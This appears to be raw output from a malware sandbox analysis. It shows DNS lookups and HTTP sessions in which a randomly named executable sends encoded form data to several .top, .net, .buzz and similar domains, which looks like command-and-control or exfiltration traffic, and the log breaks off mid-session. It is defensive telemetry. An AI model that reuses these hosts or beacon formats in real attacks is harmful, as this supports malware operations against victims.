Nov 7, 2024 15:52:18.417372942 CET | 192.168.2.10 | 1.1.1.1 | 0x7af9 | Standard query (0) | www.jllllbx.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 7, 2024 15:50:15.117604017 CET | 1.1.1.1 | 192.168.2.10 | 0x5eda | Name error (3) | www.mt2rahu.tech | none | none | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:20.226219893 CET | 1.1.1.1 | 192.168.2.10 | 0x9747 | No error (0) | www.lexjetcenter.net | lexjetcenter.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:50:20.226219893 CET | 1.1.1.1 | 192.168.2.10 | 0x9747 | No error (0) | lexjetcenter.net |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:20.226219893 CET | 1.1.1.1 | 192.168.2.10 | 0x9747 | No error (0) | lexjetcenter.net |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:37.893816948 CET | 1.1.1.1 | 192.168.2.10 | 0xc47e | No error (0) | www.elarac.top |  | 192.64.118.221 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:50:52.066457987 CET | 1.1.1.1 | 192.168.2.10 | 0x3bf1 | No error (0) | www.budged.net | budged.net |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 7, 2024 15:50:52.066457987 CET | 1.1.1.1 | 192.168.2.10 | 0x3bf1 | No error (0) | budged.net |  | 195.154.200.15 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:06.836339951 CET | 1.1.1.1 | 192.168.2.10 | 0x32d6 | No error (0) | www.5hdgb2p9a.buzz |  | 168.76.221.252 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:21.316452980 CET | 1.1.1.1 | 192.168.2.10 | 0xbe53 | No error (0) | www.j252mv.site |  | 150.95.254.16 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:35.638514996 CET | 1.1.1.1 | 192.168.2.10 | 0x48f9 | No error (0) | www.lnnn.fun |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:35.638514996 CET | 1.1.1.1 | 192.168.2.10 | 0x48f9 | No error (0) | www.lnnn.fun |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:51:49.825793028 CET | 1.1.1.1 | 192.168.2.10 | 0x8b0 | No error (0) | www.7153115.xyz |  | 103.249.106.91 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:03.711690903 CET | 1.1.1.1 | 192.168.2.10 | 0xfed1 | No error (0) | www.tingba.sbs |  | 172.67.202.10 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:03.711690903 CET | 1.1.1.1 | 192.168.2.10 | 0xfed1 | No error (0) | www.tingba.sbs |  | 104.21.22.22 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:18.536149025 CET | 1.1.1.1 | 192.168.2.10 | 0x7af9 | No error (0) | www.jllllbx.top |  | 156.234.28.94 | A (IP address) | IN (0x0001) | false
Nov 7, 2024 15:52:18.536604881 CET | 1.1.1.1 | 192.168.2.10 | 0x7af9 | No error (0) | www.jllllbx.top |  | 156.234.28.94 | A (IP address) | IN (0x0001) | false
• www.lexjetcenter.net
• www.elarac.top
• www.budged.net
• www.5hdgb2p9a.buzz
• www.j252mv.site
• www.lnnn.fun
• www.7153115.xyz
• www.tingba.sbs
• www.jllllbx.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49973 | 3.33.130.190 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:50:20.273966074 CET | 520 | OUT
  GET /ugdo/?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth HTTP/1.1
  Host: www.lexjetcenter.net
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Connection: close
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Nov 7, 2024 15:50:22.133512974 CET | 394 | IN
  HTTP/1.1 200 OK
  Server: openresty
  Date: Thu, 07 Nov 2024 14:50:21 GMT
  Content-Type: text/html
  Content-Length: 254
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 4c 2d 78 3d 6b 78 4a 33 6f 64 33 32 35 58 71 6f 38 77 78 51 31 68 42 67 52 36 53 44 6d 32 44 79 4a 33 77 74 65 43 45 49 2f 44 69 47 4f 76 4d 75 48 4b 58 64 46 51 76 56 37 4b 70 4a 66 38 78 4e 57 4e 63 47 64 6f 71 30 68 42 77 52 66 70 34 50 74 63 70 51 63 4a 59 63 71 56 6d 36 68 55 53 6c 7a 69 33 44 4c 69 4c 42 71 61 58 51 6d 54 42 69 68 6e 38 33 30 77 3d 3d 26 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth"}</script></head></html>
Nov 7, 2024 15:50:22.133559942 CET | 394 | IN
  HTTP/1.1 200 OK
  Server: openresty
  Date: Thu, 07 Nov 2024 14:50:21 GMT
  Content-Type: text/html
  Content-Length: 254
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 65 4c 2d 78 3d 6b 78 4a 33 6f 64 33 32 35 58 71 6f 38 77 78 51 31 68 42 67 52 36 53 44 6d 32 44 79 4a 33 77 74 65 43 45 49 2f 44 69 47 4f 76 4d 75 48 4b 58 64 46 51 76 56 37 4b 70 4a 66 38 78 4e 57 4e 63 47 64 6f 71 30 68 42 77 52 66 70 34 50 74 63 70 51 63 4a 59 63 71 56 6d 36 68 55 53 6c 7a 69 33 44 4c 69 4c 42 71 61 58 51 6d 54 42 69 68 6e 38 33 30 77 3d 3d 26 77 46 56 48 3d 2d 7a 77 54 4b 50 46 30 69 50 74 68 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?eL-x=kxJ3od325Xqo8wxQ1hBgR6SDm2DyJ3wteCEI/DiGOvMuHKXdFQvV7KpJf8xNWNcGdoq0hBwRfp4PtcpQcJYcqVm6hUSlzi3DLiLBqaXQmTBihn830w==&wFVH=-zwTKPF0iPth"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49974 | 192.64.118.221 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:50:37.962073088 CET | 764 | OUT
  POST /favd/ HTTP/1.1
  Host: www.elarac.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Accept-Encoding: gzip, deflate
  Origin: http://www.elarac.top
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: no-cache
  Connection: close
  Content-Length: 193
  Referer: http://www.elarac.top/favd/
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
  Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 73 6b 6d 37 66 2f 41 74 52 6f 42 2b 6b 7a 66 59 51 52 4b 50 47 65 41 79 71 42 43 4c 67 47 45 4f 31 65 2b 4a 61 6c 73 37 34 47 55 63 73 46 50 62 52 42 2b 35 5a 49 76 55 70 59 70 50 68 4c 6e 2f 6e 58 67 72 62 37 59 78 4d 78 6d 31 63 79 2f 77 54 45 70 4e 36 77 79 59 57 58 2f 39 31 65 48 43 77 6b 73 78 78 2f 54 51 72 57 4c 50 42 50 59 39 62 68 2f 30 78 39 43 6f 56 43 57 38 63 57 49 32 75 71 33 77 2b 35 4c 6a 42 51 30 37 63 6d 4c 63 71 37 67 6c 35 78 34 6f 72 55 2b 2f 38 4e 51 7a 35 50 58 37 38 48 63 77 71 72 30 42 33 55 6e 55
  Data Ascii: eL-x=bvINCE2+At1Sskm7f/AtRoB+kzfYQRKPGeAyqBCLgGEO1e+Jals74GUcsFPbRB+5ZIvUpYpPhLn/nXgrb7YxMxm1cy/wTEpN6wyYWX/91eHCwksxx/TQrWLPBPY9bh/0x9CoVCW8cWI2uq3w+5LjBQ07cmLcq7gl5x4orU+/8NQz5PX78Hcwqr0B3UnU
Nov 7, 2024 15:50:38.646874905 CET | 533 | IN
  HTTP/1.1 404 Not Found
  Date: Thu, 07 Nov 2024 14:50:38 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.10 | 49975 | 192.64.118.221 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:50:40.648349047 CET | 788 | OUT
  POST /favd/ HTTP/1.1
  Host: www.elarac.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Accept-Encoding: gzip, deflate
  Origin: http://www.elarac.top
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: no-cache
  Connection: close
  Content-Length: 217
  Referer: http://www.elarac.top/favd/
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
  Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 74 42 32 37 63 59 30 74 41 34 42 2f 67 44 66 59 66 78 4b 44 47 65 45 79 71 45 69 62 68 31 67 4f 30 2b 75 4a 62 6e 45 37 30 6d 55 63 6d 6c 50 65 66 68 2b 69 5a 49 79 33 70 5a 6c 50 68 4c 7a 2f 6e 57 51 72 48 59 67 32 4e 68 6d 33 64 43 2f 49 4c 6b 70 4e 36 77 79 59 57 54 58 48 31 65 50 43 77 58 30 78 78 61 7a 54 6f 57 4c 41 52 66 59 39 66 68 2b 2f 78 39 43 47 56 47 4f 53 63 56 77 32 75 75 37 77 2b 4d 6e 67 57 67 31 79 53 47 4c 4f 71 72 67 71 7a 44 51 50 79 56 4f 32 67 2b 34 73 2b 75 71 38 74 57 39 6e 35 63 6f 50 35 53 53 2b 67 4f 47 66 74 68 35 42 55 46 43 76 41 6e 52 30 49 6b 43 69 4c 41 3d 3d
  Data Ascii: eL-x=bvINCE2+At1StB27cY0tA4B/gDfYfxKDGeEyqEibh1gO0+uJbnE70mUcmlPefh+iZIy3pZlPhLz/nWQrHYg2Nhm3dC/ILkpN6wyYWTXH1ePCwX0xxazToWLARfY9fh+/x9CGVGOScVw2uu7w+MngWg1ySGLOqrgqzDQPyVO2g+4s+uq8tW9n5coP5SS+gOGfth5BUFCvAnR0IkCiLA==
Nov 7, 2024 15:50:41.329152107 CET | 533 | IN
  HTTP/1.1 404 Not Found
  Date: Thu, 07 Nov 2024 14:50:41 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.10 | 49976 | 192.64.118.221 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
Timestamp | Bytes transferred | Direction | Data
Nov 7, 2024 15:50:43.223819971 CET | 1801 | OUT
  POST /favd/ HTTP/1.1
  Host: www.elarac.top
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US,en;q=0.9
  Accept-Encoding: gzip, deflate
  Origin: http://www.elarac.top
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: no-cache
  Connection: close
  Content-Length: 1229
  Referer: http://www.elarac.top/favd/
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
  Data Raw: 65 4c 2d 78 3d 62 76 49 4e 43 45 32 2b 41 74 31 53 74 42 32 37 63 59 30 74 41 34 42 2f 67 44 66 59 66 78 4b 44 47 65 45 79 71 45 69 62 68 31 6f 4f 30 49 69 4a 61 41 59 37 31 6d 55 63 6c 6c 50 66 66 68 2f 36 5a 49 71 72 70 5a 35 78 68 4a 4c 2f 6d 77 73 72 4c 35 67 32 48 68 6d 33 57 69 2f 7a 54 45 70 59 36 78 44 66 57 58 7a 48 31 65 50 43 77 52 59 78 32 50 54 54 75 57 4c 50 42 50 59 4c 62 68 2f 59 78 39 61 77 56 47 61 73 64 6b 51 32 76 4f 72 77 38 61 54 67 55 41 31 77 56 47 4b 64 71 72 74 71 7a 44 4d 44 79 56 36 4d 67 2b 51 73 38 34 76 63 34 69 35 52 71 4e 55 4b 39 30 47 76 71 71 69 65 30 42 5a 64 63 77 75 6b 43 54 38 43 42 6d 6a 63 58 53 43 65 38 73 52 79 41 58 34 35 73 68 4e 39 6f 46 76 53 54 36 65 76 30 4b 4d 6f 35 4e 52 51 51 71 4a 79 4c 42 4d 45 63 2f 30 4a 61 39 64 4f 36 55 52 58 58 6a 48 75 6a 58 2f 51 6e 44 79 59 6c 78 52 54 6f 6a 65 41 6a 50 36 30 75 44 74 30 69 2f 49 77 61 5a 46 44 6d 2b 33 36 4b 70 45 37 62 31 6a 48 76 44 71 43 69 4e 6c 69 41 47 59 53 64 61 54 47 6c 6d 30 69 75 62 33 74 36 [TRUNCATED]
  Data Ascii: eL-x=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 [TRUNCATED]
Nov 7, 2024 15:50:43.877651930 CET | 533 | IN
  HTTP/1.1 404 Not Found
  Date: Thu, 07 Nov 2024 14:50:43 GMT
  Server: Apache
  Content-Length: 389
  Connection: close
  Content-Type: text/html
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         4           192.168.2.10  49977        192.64.118.221  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:50:45.798866987 CET  514                OUT        GET /favd/?wFVH=-zwTKPF0iPth&eL-x=WtgtBzW4FsxMnQSuWOIYSeEoiXDfOi+mEu8byEiY5V0Es9uEUQhozXoYk37/fSn7c76G5+FTj9P/4AI0dbo7dAuFWhjyFRNqxijvASv2x9K31F87tg== HTTP/1.1
                                                        Host: www.elarac.top
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                         Nov 7, 2024 15:50:46.482928991 CET  548                IN         HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:50:46 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         5           192.168.2.10  49978        195.154.200.15  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:50:52.097975016 CET  764                OUT        POST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4a 57 50 58 6a 4b 79 71 6f 51 47 4a 71 52 30 79 50 77 35 34 37 44 2b 4e 2f 65 77 59 6a 54 5a 6a 4c 30 38 55 31 7a 32 69 4e 54 54 41 6a 68 36 76 45 61 57 52 56 47 4d 35 38 30 54 66 5a 6d 46 68 44 61 31 55 30 35 32 34 62 41 37 6e 34 33 46 70 4a 31 79 77 5a 4f 51 69 68 58 49 52 73 55 6e 31 71 4d 39 77 64 77 46 48 44 54 39 78 31 39 52 71 2b 50 57 49 62 42 66 6a 4e 45 51 64 52 34 65 6b 50 59 6e 31 6a 61 4f 78 6b 6e 44 65 57 51 52 55 74 6b 77 61 30 43 76 30 49 45 50 59 62 64 6d 67 41 67 4b 54 48 63 67 30 53 2f 58 6c 32 50 48 4d 65 70 58 58 53 66 54 70 62 33 71 33
                                                        Data Ascii: eL-x=JWPXjKyqoQGJqR0yPw547D+N/ewYjTZjL08U1z2iNTTAjh6vEaWRVGM580TfZmFhDa1U0524bA7n43FpJ1ywZOQihXIRsUn1qM9wdwFHDT9x19Rq+PWIbBfjNEQdR4ekPYn1jaOxknDeWQRUtkwa0Cv0IEPYbdmgAgKTHcg0S/Xl2PHMepXXSfTpb3q3


                                                         Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                                                         6           192.168.2.10  49979        195.154.200.15  80                6584  C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                         Timestamp                           Bytes transferred  Direction  Data
                                                         Nov 7, 2024 15:50:54.643986940 CET  788                OUT        POST /zslv/ HTTP/1.1
                                                        Host: www.budged.net
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.budged.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.budged.net/zslv/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
